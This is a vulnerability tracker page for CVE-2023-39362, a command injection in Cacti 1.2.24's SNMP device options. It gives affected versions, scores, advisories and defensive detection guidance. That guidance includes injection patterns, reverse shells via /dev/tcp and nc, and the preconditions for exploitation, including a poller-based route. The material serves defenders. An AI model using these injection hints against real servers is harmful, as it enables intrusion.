CVE-2023-39362
published 2023-09-05CVE-2023-39362: Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can…
PriorityP270high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
82.19%
99.6th percentile
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cacti | cacti | < 1.2.25 | 1.2.25 |
| cacti | cacti | >= 0 < 1.2.16+ds1-2+deb11u2 | 1.2.16+ds1-2+deb11u2 |
| cacti | cacti | >= 0 < 1.2.24+ds1-1+deb12u1 | 1.2.24+ds1-1+deb12u1 |
| cacti | cacti | >= 0 < 1.2.25+ds1-1 | 1.2.25+ds1-1 |
| cacti | cacti | >= 0 < 1.2.25+ds1-1 | 1.2.25+ds1-1 |
| debian | cacti | < cacti 1.2.24+ds1-1+deb12u1 (bookworm) | cacti 1.2.24+ds1-1+deb12u1 (bookworm) |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor SNMP Community String fields in Cacti Device configuration for shell metacharacters, particularly single-quote escapes and semicolons (e.g., patterns matching `\'\s*;` or `;\'`) indicative of command injection attempts. ↗
- →Alert on Cacti poller or web process spawning unexpected child processes (e.g., bash, touch, nc) as a result of exec() calls originating from lib/snmp.php. ↗
- →Detect reverse shell attempts via /dev/tcp from Cacti server processes, consistent with the bash reverse shell payload used in exploitation of this CVE. ↗
- →Exploitation can also occur via the Cacti poller on existing devices; monitor for unexpected file creation under /tmp by the Cacti poller process. ↗
- ·Exploitation requires the attacker to be authenticated with privileges to manage Devices and/or Graphs (e.g., 'Sites/Devices/Data', 'Graphs'); unauthenticated users cannot trigger this vulnerability. ↗
- ·The vulnerability is only exploitable when the PHP snmp module is NOT installed; if the PHP snmp module is present, the vulnerable exec() code path in lib/snmp.php is not reached. ↗
- ·A Device that supports SNMP (version 1 or 2) and has Net-SNMP Graph templates must be available; without these conditions the injection payload is not triggered. ↗
- ·When exploiting via an existing device through the poller, it may be necessary to change the 'Downed Device Detection' field to a non-SNMP method, as the malicious payload could break SNMP interaction with the host. ↗
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
osv7.2HIGH
vendor_debian7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2023-39362: cacti - Cacti is an open source operational monitoring and fault management framework. I...
vendor_debian·2023·CVSS 7.2
CVE-2023-39362 [HIGH] CVE-2023-39362: cacti - Cacti is an open source operational monitoring and fault management framework. I...
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Scope: local
bookworm: resolved (fixed in 1.2.24+ds1-1+deb12u1)
bullseye: resolved (fixed in 1.2.16+ds1-2+deb11u2)
forky: resolved (fixed in 1.2.25+ds1-1)
sid: resolved (fixed in
OSV
CVE-2023-39362: Cacti is an open source operational monitoring and fault management framework
osv·2023-09-05·CVSS 7.2
CVE-2023-39362 [HIGH] CVE-2023-39362: Cacti is an open source operational monitoring and fault management framework
Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/175029/Cacti-1.2.24-Command-Injection.htmlhttps://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cphttps://lists.debian.org/debian-lts-announce/2024/03/msg00018.htmlhttps://lists.fedoraproject.org/archives/list/[email protected]/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/https://lists.fedoraproject.org/archives/list/[email protected]/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/https://lists.fedoraproject.org/archives/list/[email protected]/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/https://www.debian.org/security/2023/dsa-5550http://packetstormsecurity.com/files/175029/Cacti-1.2.24-Command-Injection.htmlhttps://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cphttps://lists.debian.org/debian-lts-announce/2024/03/msg00018.htmlhttps://lists.fedoraproject.org/archives/list/[email protected]/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/https://lists.fedoraproject.org/archives/list/[email protected]/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/https://lists.fedoraproject.org/archives/list/[email protected]/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/https://www.debian.org/security/2023/dsa-5550https://www.vicarius.io/vsociety/posts/command-injection-in-cacti-cve-2023-39362
2023-09-05
Published